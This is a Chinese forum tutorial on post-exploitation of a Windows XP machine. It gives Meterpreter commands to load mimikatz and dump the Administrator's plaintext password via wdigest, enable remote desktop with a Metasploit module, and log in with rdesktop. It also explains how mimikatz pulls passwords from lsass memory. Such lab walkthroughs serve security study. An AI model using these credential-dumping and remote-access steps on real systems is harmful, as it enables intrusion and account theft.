|
|
当我们获取系统的权限后,如果更高一步的获取权限呢,比如获取当前管理员的密码,开启远程桌面等。今天就让我们一起来看看吧。
PART 1/获取权限shell
如上,我们已经获取了系统的shell。当前受害系统为windows xp
PART 2/破解系统密码
载入mimikatz
[pre]
load mimikatz
[/pre]
获取密码
[pre]
wdigest
[/pre]
如图,当前Administrator的密码为bbskali.cn
PART 3/开启远程桌面
[pre]
run post/windows/manage/enable_rdp
[/pre]
PART4/连接远程桌面
[pre]
rdesktop 192.168.1.109 -u user -p password
[/pre]
PART5/拓展
mimikatz介绍
mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统! |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|
[复制链接]
发表于 2019-1-12 17:39:16
